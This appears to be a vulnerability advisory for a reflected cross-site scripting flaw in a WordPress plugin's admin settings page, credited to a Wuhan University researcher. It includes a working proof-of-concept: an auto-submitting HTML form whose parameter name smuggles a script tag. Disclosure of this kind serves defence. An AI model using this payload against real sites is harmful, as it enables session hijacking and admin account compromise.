The plugin does not sanitise and escape the POST data before outputting it back in attributes of an admin page, leading to a Reflected Cross-Site scripting. Due to the presence of specific parameter value, available to admin users, this can only be exploited by an admin against another admin user.
The GOTMLS_mt parameter value is retrieved when being logged in as admin and view the source code of /wp-admin/admin.php?page=GOTMLS-settings for example. Then, use the code below to XSS another admin <html> <body> <form action="https://example.com/wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_mt=dd950912e933626ba251bed092e2f9ba&scan_what=2" id="hack" method="POST"> <input type="hidden" name='x"><script>alert(/XSS/);</script>' value="1" /> <input type="submit" value="Submit request" /> </form> </body> <script> var form1 = document.getElementById('hack'); form1.submit(); </script> </html>
ZhongFu Su(JrXnm) of Wuhan University
ZhongFu Su(JrXnm) of Wuhan University
Yes
2022-01-24 (about 1 years ago)
2022-01-24 (about 1 years ago)
2022-09-26 (about 12 months ago)